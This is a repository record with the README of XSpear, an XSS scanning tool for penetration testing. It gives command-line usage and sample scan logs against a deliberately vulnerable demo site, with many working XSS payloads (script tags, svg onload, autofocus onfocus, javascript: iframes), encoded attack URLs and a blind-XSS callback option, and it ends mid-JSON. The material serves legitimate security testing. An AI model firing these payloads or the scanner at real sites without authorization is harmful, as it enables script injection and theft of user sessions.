{"id":13542228,"url":"https://github.com/hahwul/XSpear","last_synced_at":"2025-04-02T09:33:28.032Z","repository":{"id":41530264,"uuid":"196596188","full_name":"hahwul/XSpear","owner":"hahwul","description":"🔱 Powerfull XSS Scanning and Parameter analysis tool\u0026gem","archived":false,"fork":false,"pushed_at":"2022-09-27T13:47:33.000Z","size":1121,"stargazers_count":1258,"open_issues_count":21,"forks_count":232,"subscribers_count":45,"default_branch":"master","last_synced_at":"2025-03-30T14:04:16.411Z","etag":null,"topics":["bugbounty","bugbountytips","gem","hacking","library","pentest","ruby","scanner","scanning-xss","selenium","tool","webhacking","xss"],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hahwul.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE.txt","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"custom":["https://paypal.me/hahwul","https://www.buymeacoffee.com/hahwul"]}},"created_at":"2019-07-12T14:46:28.000Z","updated_at":"2025-03-28T19:55:50.000Z","dependencies_parsed_at":"2022-09-10T21:02:48.593Z","dependency_job_id":null,"html_url":"https://github.com/hahwul/XSpear","commit_stats":null,"previous_names":[],"tags_count":14,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hahwul","download_url":"https://codeload.github.com/hahwul/XSpear/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789288,"owners_count":20834267,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bugbountytips","gem","hacking","library","pentest","ruby","scanner","scanning-xss","selenium","tool","webhacking","xss"],"created_at":"2024-08-01T10:01:03.153Z","updated_at":"2025-04-02T09:33:27.468Z","avatar_url":"https://github.com/hahwul.png","language":"Ruby","funding_links":["https://paypal.me/hahwul","https://www.buymeacoffee.com/hahwul","https://www.paypal.me/hahwul"],"categories":["Ruby","Exploitation","Weapons","Ruby (88)"],"sub_categories":["XSS Injection","Tools"],"readme":"\u003cimg src=\"https://user-images.githubusercontent.com/13212227/62058818-ffcef780-b25c-11e9-9a35-36537efbcca7.png\" width=100%\u003e\n\n# XSpear\nXSpear is XSS Scanner on ruby gems\n\n\u003cimg src=\"https://img.shields.io/github/languages/top/hahwul/xspear?color=red\"\u003e \u003cimg src=\"https://img.shields.io/gem/v/XSpear.svg\"\u003e \u003cimg src=\"https://img.shields.io/gem/dt/XSpear.svg\"\u003e \u003cimg src=\"https://img.shields.io/librariesio/sourcerank/rubygems/Xspear\"\u003e \u003cimg src=\"https://api.codacy.com/project/badge/Grade/0fa0f7cd75e34e7b9800f4fdf147605e\"\u003e \u003cimg src=\"https://img.shields.io/github/license/hahwul/XSpear.svg\"\u003e \u003ca href=\"https://twitter.com/intent/follow?screen_name=hahwul\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/hahwul?style=flat-square\"\u003e\u003c/a\u003e\n\n## TOC\n- [XSpear](#xspear)\n * [Key features](#key-features)\n * [Installation](#installation)\n + [Dependency gems](#dependency-gems)\n * [Usage on cli](#usage-on-cli)\n + [Result types](#result-types)\n + [Verbose Mode](#verbose-mode)\n + [Case by Case](#case-by-case)\n + [Sample log](#sample-log)\n * [Usage on ruby code](#usage-on-ruby-code)\n * [Add Scanning Module](#add-scanning-module)\n * [Update](#update)\n * [Development](#development)\n * [Contributing](#contributing)\n * [Donate](#donate)\n * [License](#license)\n * [Code of Conduct](#code-of-conduct)\n * [ScreenShot](#screenshot)\n * [Video](#video)\n\n## Key features\n- Pattern matching based XSS scanning\n- Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)\n- Testing request/response for XSS protection bypass and reflected(or all) params\u003cbr\u003e\n + Reflected Params\n + All params(for blind xss, anytings)\n + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`\n + Testing custom payload for only you!\n- Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)\n- Dynamic/Static Analysis\n + Find SQL Error pattern\n + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )\n + Analysis Other headers..(Server version, Content-Type, etc...)\n + XSS Testing to URI Path\n + Testing Only Parameter Analysis (aka no-XSS mode)\n- Scanning from Raw file(Burp suite, ZAP Request)\n- XSpear running on ruby code(with Gem library)\n- Show `table base cli-report` and `filtered rule`, `testing raw query`(url)\n- Testing at selected parameters\n- Support output format `cli` `json` `html`\n + cli\n + json\n + html\n- Support Verbose level (0~3)\n + 0: quite mode(only result)\n + 1: show scanning status(default)\n + 2: show scanning logs\n + 3: show detail log(req/res)\n- Support custom callback code to any test various attack vectors\n- Support Config file\n\n## Installation\n\nInstall it yourself as:\n\n $ gem install XSpear\n\nOr install it yourself as (local file / download [latest](https://github.com/hahwul/XSpear/releases/latest) ):\n\n $ gem install XSpear-{version}.gem\n \nAdd this line to your application's Gemfile:\n\n```ruby\ngem 'XSpear'\n```\n\nAnd then execute:\n\n $ bundle\n\n### Dependency gems\n`colorize` `selenium-webdriver` `terminal-table` `progress_bar`\u003cbr\u003e\nIf you configured it to install automatically in the Gem library, but it behaves abnormally, install it with the following command.\n\n```\n$ gem install colorize\n$ gem install selenium-webdriver\n$ gem install terminal-table\n$ gem install progress_bar\n```\n\n## Usage on cli\n\n```\nUsage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a \n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2\n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json\n\n[ Options ]\n -u, --url=target_URL [required] Target Url\n -d, --data=POST Body [optional] POST Method Body data\n -a, --test-all-params [optional] test to all params(include not reflected)\n --no-xss [optional] no testing xss, only parameters analysis\n --headers=HEADERS [optional] Add HTTP Headers\n --cookie=COOKIE [optional] Add Cookie\n --custom-payload=FILENAME [optional] Load custom payload json file\n --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)\n -p, --param=PARAM [optional] Test paramters\n -b, --BLIND=URL [optional] Add vector of Blind XSS\n + with XSS Hunter, ezXSS, HBXSS, etc...\n + e.g : -b https://hahwul.xss.ht\n -t, --threads=NUMBER [optional] thread , default: 10\n -o, --output=FORMAT [optional] Output format (cli , json)\n -c, --config=FILENAME [optional] Using config.json\n -v, --verbose=0~3 [optional] Show log depth\n + v=0 : quite mode(only result)\n + v=1 : show scanning status(default)\n + v=2 : show scanning logs\n + v=3 : show detail log(req/res)\n -h, --help Prints this help\n --version Show XSpear version\n --update Show how to update\n\n\n```\n### Result types\n- (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)\n- (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium\n- (L)OW: Low level issue\n- (M)EDIUM: medium level issue\n- (H)IGH: high level issue\n\n### Verbose Mode\n**[0] quite mode(show only result)**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 0\nyou see report\n```\n**[1] show progress bar (default)**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 1\n[*] analysis request..\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 2 param + blind XSS ]\n[*] test query generation is complete. [249 query]\n[*] starting XSS Scanning. [10 threads]\n\n[#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s]\n...\nyou see report\n```\n**[2] show scanning logs**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 2\n[*] analysis request..\n[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]\n[-] [22:42:41] [200/OK] 'STATIC' not reflected\n[-] [22:42:41] [200/OK] 'cat' not reflected \u003cscript\u003ealert(45)\u003c/script\u003e\n[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 2 param + blind XSS ]\n[*] test query generation is complete. [249 query]\n[*] starting XSS Scanning. [10 threads]\n[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]\n[-] [22:42:54] [200/OK] 'cat' not reflected \u003cimg/src onerror=alert(45)\u003e\n[-] [22:42:54] [200/OK] 'cat' not reflected \u003csvg/onload=alert(45)\u003e\n[H] [22:42:54] [200/OK] reflected \u003cscript\u003ealert(45)\u003c/script\u003e[param: cat][reflected XSS Code]\n[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '\"\u003e\u003csvg/onload=alert(45)\u003e[param: cat][triggered \u003csvg/onload=alert(45)\u003e]\n...\nyou see report\n```\n**[3] show scanning detail logs**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 3\n[*] analysis request..\n[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url\n[ Request ]\n{\"accept-encoding\"=\u003e[\"gzip;q=1.0,deflate;q=0.6,identity;q=0.3\"], \"accept\"=\u003e[\"*/*\"], \"user-agent\"=\u003e[\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\"], \"connection\"=\u003e[\"keep-alive\"], \"host\"=\u003e[\"testphp.vulnweb.com\"]}\n[ Response ]\n{\"server\"=\u003e[\"nginx/1.4.1\"], \"date\"=\u003e[\"Sun, 29 Dec 2019 13:53:23 GMT\"], \"content-type\"=\u003e[\"text/html\"], \"transfer-encoding\"=\u003e[\"chunked\"], \"connection\"=\u003e[\"keep-alive\"], \"x-powered-by\"=\u003e[\"PHP/5.3.10-1~lucid+2uwsgi2\"]}\n[-] [22:56:21] [200/OK] 'STATIC' not reflected\n[-] [22:56:21] [200/OK] cat=123rEfe6 in url\n...\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 2 param + blind XSS ]\n[*] test query generation is complete. [249 query]\n[*] starting XSS Scanning. [10 threads]\n...\n[ Request ]\n{\"accept-encoding\"=\u003e[\"gzip;q=1.0,deflate;q=0.6,identity;q=0.3\"], \"accept\"=\u003e[\"*/*\"], \"user-agent\"=\u003e[\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\"], \"connection\"=\u003e[\"keep-alive\"], \"host\"=\u003e[\"testphp.vulnweb.com\"]}\n[ Response ]\n{\"server\"=\u003e[\"nginx/1.4.1\"], \"date\"=\u003e[\"Sun, 29 Dec 2019 13:54:36 GMT\"], \"content-type\"=\u003e[\"text/html\"], \"transfer-encoding\"=\u003e[\"chunked\"], \"connection\"=\u003e[\"keep-alive\"], \"x-powered-by\"=\u003e[\"PHP/5.3.10-1~lucid+2uwsgi2\"]}\n[H] [22:57:33] [200/OK] reflected \u003ckeygen autofocus onfocus=alert(45)\u003e[param: cat][reflected onfocus XSS Code]\n...\nyou see report\n```\n### Case by Case\n**Scanning XSS**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -d \"searchFor=yy\"\n```\n\n**Only JSON output**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -d \"searchFor=yy\" -o json -v 0\n```\n\n**Set scanning thread**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -t 30\n```\n\n**Testing at selected parameters**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\u0026cat=123\u0026ppl=1fhhahwul\" -p cat,test\n```\n\n**Testing at all parameters**\u003cbr\u003e\n(This option is tested with or without reflection.)\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\u0026cat=123\u0026ppl=1fhhahwul\" -a\n```\n\n**Testing Only parameter analysis (aka no-xss mode)**\u003cbr\u003e\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\u0026cat=123\u0026ppl=1fhhahwul\" --no-xss\n```\n\n**Testing blind xss(all params)**\u003cbr\u003e\n(Should be used as much as possible because Blind XSS is everywhere)\u003cbr\u003e\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -b \"https://hahwul.xss.ht\" -a\n\n# Set your blind xss host. \u003c-b options\u003e\n```\n\n**Testing custom payload**\u003cbr\u003e\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" --custom-payload=custom_payload.json \n```\nin custom_payload.json file\n```json\n[\n {\n \"payload\":\"\u003csvg/onload=alert(1)\u003e\",\n \"callback\":\"P1\",\n \"descript\":\"blahblah~\"\n },\n {\n \"payload\":\"\u003csvg/onload=alert(1)\u003e\",\n \"callback\":\"P2\",\n \"descript\":\"blahblah~\"\n },\n {\n \"payload\":\"\u003c\u003e\",\n \"callback\":\"P1\",\n \"descript\":\"blahblah~\"\n }\n]\n```\n\n**for Pipeline**\u003cbr\u003e\n```\n$ xspear -u {target} -b \"your-blind-xss-host\" -a -v 0 -o json\n\n# -u : target \n# -b : testing blind xss\n# -a : test all params(test to not reflected param)\n# -v : verbose, not showing logs at value 1.\n# -o : output optios, json!\n```\nresult json data\n```\n{\n \"starttime\": \"2019-12-25 00:02:58 +0900\",\n \"endtime\": \"2019-12-25 00:03:31 +0900\",\n \"issue_count\": 25,\n \"issue_list\": [{\n \"id\": 0,\n \"type\": \"INFO\",\n \"issue\": \"DYNAMIC ANALYSIS\",\n \"method\": \"GET\",\n \"param\": \"cat\",\n \"payload\": \"XsPeaR\\\"\",\n \"description\": \"Found SQL Error Pattern\"\n }, {\n \"id\": 1,\n \"type\": \"INFO\",\n \"issue\": \"STATIC ANALYSIS\",\n \"method\": \"GET\",\n \"param\": \"-\",\n \"payload\": \"\u003coriginal query\u003e\",\n \"description\": \"Found Server: nginx/1.4.1\"\n }, {\n \"id\": 2,\n \"type\": \"INFO\",\n \"issue\": \"STATIC ANALYSIS\",\n \"method\": \"GET\",\n \"param\": \"-\",\n \"payload\": \"\u003coriginal query\u003e\",\n \"description\": \"Not set HSTS\"\n }, {\n \"id\": 3,\n \"type\": \"INFO\",\n \"issue\": \"STATIC ANALYSIS\",\n \"method\": \"GET\",\n \"param\": \"-\",\n \"payload\": \"\u003coriginal query\u003e\",\n \"description\": \"Content-Type: text/html\"\n }, {\n \"id\": 4,\n \"type\": \"LOW\",\n \"issue\": \"STATIC ANALYSIS\",\n \"method\": \"GET\",\n \"param\": \"-\",\n \"payload\": \"\u003coriginal query\u003e\",\n \"description\": \"Not Set X-Frame-Options\"\n }, {\n \"id\": 5,\n \"type\": \"MIDUM\",\n \"issue\": \"STATIC ANALYSIS\",\n \"method\": \"GET\",\n \"param\": \"-\",\n \"payload\": \"\u003coriginal query\u003e\",\n \"description\": \"Not Set CSP\"\n }, {\n \"id\": 6,\n \"type\": \"INFO\",\n \"issue\": \"REFLECTED\",\n \"method\": \"GET\",\n \"param\": \"cat\",\n \"payload\": \"rEfe6\",\n \"description\": \"reflected parameter\"\n }, {\n \"id\": 7,\n \"type\": \"INFO\",\n \"issue\": \"FILERD RULE\",\n \"method\": \"GET\",\n \"param\": \"cat\",\n \"payload\": \"onhwul=64\",\n \"description\": \"not filtered event handler on{any} pattern\"\n }\n....\n, {\n \"id\": 17,\n \"type\": \"HIGH\",\n \"issue\": \"XSS\",\n \"method\": \"GET\",\n \"param\": \"cat\",\n \"payload\": \"\u003caudio src onloadstart=alert(45)\u003e\",\n \"description\": \"reflected HTML5 XSS Code\"\n }, {\n \"id\": 18,\n \"type\": \"HIGH\",\n \"issue\": \"XSS\",\n \"method\": \"GET\",\n \"param\": \"cat\",\n \"payload\": \"\u003ckeygen autofocus onfocus=alert(45)\u003e\",\n \"description\": \"reflected onfocus XSS Code\"\n ....\n }, {\n \"id\": 24,\n \"type\": \"HIGH\",\n \"issue\": \"XSS\",\n \"method\": \"GET\",\n \"param\": \"cat\",\n \"payload\": \"\u003cmarquee onstart=alert(45)\u003e\",\n \"description\": \"triggered \u003cmarquee onstart=alert(45)\u003e\"\n }]\n}\n```\n(Items marked as `triggered` are actually payloads that work in the browser.)\n\n**XSpear on Burpsuite**\u003cbr\u003e\nhttps://github.com/hahwul/XSpear/tree/master/forBurp\n\netc...\n\n### Sample log\n**Scanning XSS**\n```\nxspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=z\"\n ) (\n ( /( )\\ )\n )\\())(()/( ( ) (\n((_)\\ /(_))` ) ))\\ ( /( )(\n__((_)(_)) /(/( /((_))(_))(()\\\n\\ \\/ // __|((_)_\\ (_)) ((_)_ ((_)\n \u003e \u003c \\__ \\| '_ \\)/ -_)/ _` || '_|\n/_/\\_\\|___/| .__/ \\___|\\__,_||_| /\u003e\n |_| \\ /\u003c\n{\\\\\\\\\\\\\\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\\\\\\\\\\\\(0):::\u003c======================-\n / \\\u003c\n \\\u003e [ v1.4.0 ]\n[*] analysis request..\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 1 param ]\n[*] test query generation is complete. [251 query]\n[*] starting XSS Scanning. [10 threads]\n...snip...\n[*] finish scan. the report is being generated..\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n| [ XSpear report ] |\n| http://testphp.vulnweb.com/listproducts.php?cat=123\u0026zfdfasdf=124fff... (snip) |\n| 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. |\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n| NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n| 0 | INFO | STATIC ANALYSIS | GET | - | \u003coriginal query\u003e | Found Server: nginx/1.4.1 |\n| 1 | INFO | STATIC ANALYSIS | GET | - | \u003coriginal query\u003e | Not set HSTS |\n| 2 | INFO | STATIC ANALYSIS | GET | - | \u003coriginal query\u003e | Content-Type: text/html |\n| 3 | LOW | STATIC ANALYSIS | GET | - | \u003coriginal query\u003e | Not Set X-Frame-Options |\n| 4 | MIDUM | STATIC ANALYSIS | GET | - | \u003coriginal query\u003e | Not Set CSP |\n| 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR\" | Found SQL Error Pattern |\n| 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |\n| 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |\n| 8 | HIGH | XSS | GET | cat | \u003cscript\u003ealert(45)\u003c/script\u003e | reflected XSS Code |\n| 9 | HIGH | XSS | GET | cat | \u003cmarquee onstart=alert(45)\u003e | reflected HTML5 XSS Code |\n| 10 | HIGH | XSS | GET | cat | \u003cdetails/open/ontoggle=\"alert`45`\"\u003e | reflected HTML5 XSS Code |\n| 11 | HIGH | XSS | GET | cat | \u003cselect autofocus onfocus=alert(45)\u003e | reflected onfocus XSS Code |\n| 12 | HIGH | XSS | GET | cat | \u003cinput autofocus onfocus=alert(45)\u003e | reflected onfocus XSS Code |\n| 13 | HIGH | XSS | GET | cat | \u003ctextarea autofocus onfocus=alert(45)\u003e | reflected onfocus XSS Code |\n| 14 | HIGH | XSS | GET | cat | \u003caudio src onloadstart=alert(45)\u003e | reflected HTML5 XSS Code |\n| 15 | HIGH | XSS | GET | cat | \u003cmeter onmouseover=alert(45)\u003e0\u003c/meter\u003e | reflected HTML5 XSS Code |\n| 16 | HIGH | XSS | GET | cat | \"\u003e\u003ciframe/src=JavaScriPt:alert(45)\u003e | reflected XSS Code |\n| 17 | HIGH | XSS | GET | cat | \u003cvideo/poster/onerror=alert(45)\u003e | reflected HTML5 XSS Code |\n| 18 | HIGH | XSS | GET | cat | \u003ckeygen autofocus onfocus=alert(45)\u003e | reflected onfocus XSS Code |\n| 19 | VULN | XSS | GET | cat | \u003cscript\u003ealert(45)\u003c/script\u003e | triggered \u003cscript\u003ealert(45)\u003c/script\u003e |\n| 20 | HIGH | XSS | GET | cat | \u003cmarquee onstart=alert(45)\u003e | triggered \u003cmarquee onstart=alert(45)\u003e |\n| 21 | HIGH | XSS | GET | cat | \u003cdetails/open/ontoggle=\"alert(45)\"\u003e | triggered \u003cdetails/open/ontoggle=\"alert(45)\"\u003e |\n| 22 | HIGH | XSS | GET | cat | \u003caudio src onloadstart=alert(45)\u003e | triggered \u003caudio src onloadstart=alert(45)\u003e |\n| 23 | VULN | XSS | GET | cat | '\"\u003e\u003csvg/onload=alert(45)\u003e | triggered \u003csvg/onload=alert(45)\u003e |\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n\u003c Available Objects \u003e\n[cat] param\n + Available Special Char: ` ( \\ ' { ) } [ : $ ]\n + Available Event Handler: \"onBeforeEditFocus\",\"onAbort\",\"onActivate\",\"onAfterUpdate\",\"onBeforeCopy\",\"onAfterPrint\",\"onBeforeActivate\",\"onBeforeCut\",\"onBeforeDeactivate\",\"onChange\",\"onBeforePrint\",\"onBounce\",\"onBeforeUnload\",\"onCellChange\",\"onBeforePaste\",\"onClick\",\"onBegin\",\"onBlur\",\"onBeforeUpdate\",\"onDataSetChanged\",\"onCut\",\"onDblClick\",\"onCopy\",\"onContextMenu\",\"onDataSetComplete\",\"onDeactivate\",\"onDataAvailable\",\"onControlSelect\",\"onDrag\",\"onDrop\",\"onDragEnd\",\"onEnd\",\"onDragLeave\",\"onDragStart\",\"onDragOver\",\"onDragEnter\",\"onDragDrop\",\"onError\",\"onErrorUpdate\",\"onFinish\",\"onFilterChange\",\"onKeyPress\",\"onHelp\",\"onFocus\",\"onInput\",\"onHashChange\",\"onKeyDown\",\"onFocusIn\",\"onFocusOut\",\"onMessage\",\"onMouseDown\",\"onLoad\",\"onLayoutComplete\",\"onMouseEnter\",\"onLoseCapture\",\"onloadstart\",\"onMediaError\",\"onKeyUp\",\"onMediaComplete\",\"onMouseOver\",\"onMouseWheel\",\"onMove\",\"onMouseMove\",\"onMouseOut\",\"onOffline\",\"onMoveStart\",\"onMouseLeave\",\"onMouseUp\",\"onMoveEnd\",\"onPropertyChange\",\"onOnline\",\"onPause\",\"onPaste\",\"onReadyStateChange\",\"onRedo\",\"onProgress\",\"onPopState\",\"onOutOfSync\",\"onRepeat\",\"onResume\",\"onRowExit\",\"onReset\",\"onResizeEnd\",\"onRowsEnter\",\"onResizeStart\",\"onReverse\",\"onRowDelete\",\"onRowInserted\",\"onResize\",\"onStop\",\"onSeek\",\"onSelect\",\"onSubmit\",\"onStorage\",\"onStart\",\"onScroll\",\"onSelectionChange\",\"onSyncRestored\",\"onSelectStart\",\"onUnload\",\"ontouchstart\",\"onbeforescriptexecute\",\"onTimeError\",\"onURLFlip\",\"ontouchmove\",\"ontouchend\",\"onTrackChange\",\"onUndo\",\"onafterscriptexecute\",\"onpointermove\",\"onpointerleave\",\"onpointerup\",\"onpointerover\",\"onpointerdown\",\"onpointerenter\",\"onloadstart\",\"onloadend\",\"onpointerout\"\n + Available HTML Tag: \"script\",\"img\",\"embed\",\"video\",\"audio\",\"meta\",\"style\",\"frame\",\"iframe\",\"svg\",\"object\",\"frameset\",\"applet\"\n + Available Useful Code: \"document.cookie\",\"document.location\",\"window.location\"\n\n\u003c Raw Query \u003e\n[0] http://testphp.vulnweb.com/listproducts.php?-\n..snip..\n[19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E\u0026zfdfasdf=124fffff\n[20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E\u0026zfdfasdf=124fffff\n[21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E\u0026zfdfasdf=124fffff\n[22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E\u0026zfdfasdf=124fffff\n[23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E\u0026zfdfasdf=124fffff\n\n...snip...\n``` \n\n**to JSON**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\u0026zfdfasdf=124fffff\" -v 1 -o json\n{\"starttime\":\"2019-08-14 23:58:12 +0900\",\"endtime\":\"2019-08-14 23:58:44 +0900\",\"issue_count\":24,\"issue_list\":[{\"id\":0,\"type\":\"INFO\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Found Server: nginx/1.4.1\"},{\"id\":1,\"type\":\"INFO\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Not set HSTS\"},{\"id\":2,\"type\":\"INFO\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Content-Type: text/html\"},{\"id\":3,\"type\":\"LOW\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Not Set X-Frame-Options\"},{\"id\":4,\"type\":\"MIDUM\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Not Set CSP\"},{\"id\":5,\"type\":\"INFO\",\"issue\":\"DYNAMIC ANALYSIS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"XsPeaR\\\"\",\"description\":\"Found SQL Error Pattern\"},{\"id\":6,\"type\":\"INFO\",\"issue\":\"REFLECTED\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"rEfe6\",\"description\":\"reflected parameter\"},{\"id\":7,\"type\":\"INFO\",\"issue\":\"FILERD RULE\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"onhwul=64\",\"description\":\"not filtered event handler on{any} pattern\"},{\"id\":8,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cscript\u003ealert(45)\u003c/script\u003e\",\"description\":\"reflected XSS Code\"},{\"id\":9,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003ctextarea autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":10,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cvideo/poster/onerror=alert(45)\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":11,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003caudio src onloadstart=alert(45)\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":12,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cdetails/open/ontoggle=\\\"alert`45`\\\"\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":13,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cselect autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":14,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cmarquee onstart=alert(45)\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":15,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cinput autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":16,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\\\"\u003e\u003ciframe/src=JavaScriPt:alert(45)\u003e\",\"description\":\"reflected XSS Code\"},{\"id\":17,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cmeter onmouseover=alert(45)\u003e0\u003c/meter\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":18,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003ckeygen autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":19,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003caudio src onloadstart=alert(45)\u003e\",\"description\":\"triggered \u003caudio src 